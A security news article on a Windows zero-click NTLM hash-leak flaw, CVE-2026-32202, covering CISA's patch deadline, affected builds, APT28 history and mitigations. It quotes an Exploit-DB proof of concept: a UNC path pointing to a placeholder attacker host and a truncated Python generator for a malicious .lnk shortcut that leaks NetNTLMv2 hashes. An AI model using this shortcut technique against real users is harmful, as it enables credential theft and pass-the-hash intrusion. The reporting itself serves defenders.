CISA has added CVE-2026-32202 to its Known Exploited Vulnerabilities catalog and directed federal agencies to patch the Windows flaw, which is already being used in zero-day attacks. Discovered by Akamai, the bug is a zero-click NTLM hash leak that survived Microsoft's incomplete February fix for an earlier remote-code-execution issue, CVE-2026-21510. Leaked NTLM hashes can be replayed in pass-the-hash attacks, giving an intruder a path to lateral movement and data theft across a network.

What the vulnerability does

According to Microsoft, an attacker can trigger CVE-2026-32202 remotely in a low-complexity attack by delivering a malicious file to the victim; once that file is executed, it exposes sensitive information. Akamai's analysis clarifies what that "sensitive information" amounts to in practice: the leak hands an attacker the victim's NTLM hashes, which can then be reused to authenticate as the compromised account. From there, the usual post-compromise objectives — moving laterally and exfiltrating data — become possible without ever cracking the password.

A separate public writeup published on Exploit-DB by the researcher nu11secur1ty frames the same CVE as a spoofing weakness in the Windows Shell (File Explorer) and describes a fully zero-click trigger. Per that writeup, a crafted .lnk shortcut containing a UNC path that points at an attacker-controlled SMB server causes the target to send a NetNTLMv2 authentication request the moment the folder holding the shortcut is opened — no click on the shortcut itself is required, only viewing the directory.

Severity and affected products

The detail below comes from the Exploit-DB submission rather than from Microsoft's advisory or NVD (the NVD and CVE.org records returned no enrichment at the time of writing), so treat the specifics as the researcher's characterization:

  • CVSS: 4.3 (Medium) — a NetNTLMv2 hash leak
  • Attack vector: Network (SMB, port 445)
  • Privileges required: None — the user only needs to open a folder
  • User interaction: None (zero-click)

The same writeup lists the affected builds as:

  • Windows 11 23H2, 24H2, 25H2, 26H1
  • Windows 10 21H2–22H2
  • Windows Server 2019 / 2022 / 2025

It cites a fix in Microsoft's April 2026 Patch Tuesday, identified as KB2026-04214.

Proof of concept

The Exploit-DB entry documents the authentication request that the malicious shortcut elicits:


SMB/CIFS NTLMv2 Authentication Request
UNC Path: \\ATTACKER_IP\share\payload.dll
Protocol: SMB2 (port 445)
Hash Type: NetNTLMv2

It also publishes a Python generator that builds a .lnk file designed to leak the hash to a listener such as Responder or Impacket. The published snippet is truncated in the source; the portion released is reproduced verbatim below, and the complete script is available in the original Exploit-DB entry (EDB-ID 52601):


#!/usr/bin/env python3
"""
CVE-2026-32202 LNK Exploit Generator
Author: nu11secur1ty
Generates LNK file that leaks NTLM hash to Responder/Impacket
"""

import struct
import sys
import os

def create_malicious_lnk(attacker_ip, output_file="exploit.lnk",
share_name="share"):
    """
    Creates LNK file with UNC path to attacker machine
    """

    unc_path = f"\\\\{attacker_ip}\\{share_name}\\test"
    unc_utf16 = unc_path.encode('utf-16le') + b'\x00\x00'

    # ... (truncated in source — see full PoC at the link above)

A flaw with a state-sponsored backstory

CVE-2026-32202 lingered because Microsoft only partially remediated the underlying remote-code-execution bug, CVE-2026-21510, in February. That earlier flaw already had an active-exploitation history: Ukraine's CERT-UA reported that the Russian state-backed group APT28 (also tracked as Fancy Bear) chained CVE-2026-21510 with a distinct LNK vulnerability, CVE-2026-21513, in operations against Ukraine and EU targets in December 2025. Microsoft has said it has not, to date, connected the newer zero-click hash-leak bug to APT28 activity.

Mitigation and the federal deadline

In adding CVE-2026-32202 to its KEV catalog, CISA set a May 12 deadline for Federal Civilian Executive Branch agencies to apply the patch under Binding Operational Directive 22-01, and it encouraged all organizations to prioritize the update. Because the leak rides on outbound SMB authentication, defenders can also reduce exposure by blocking outbound SMB (ports 445 and 139) at the network perimeter, enforcing SMB signing, and restricting or disabling NTLM where feasible — alongside applying the vendor fix.

CVE-2026-32202 is not the only Windows problem demanding attention right now. Attackers are also actively exploiting three other recently disclosed Windows bugs nicknamed BlueHammer, RedSun, and UnDefend; the latter two were still awaiting patches at the time of reporting.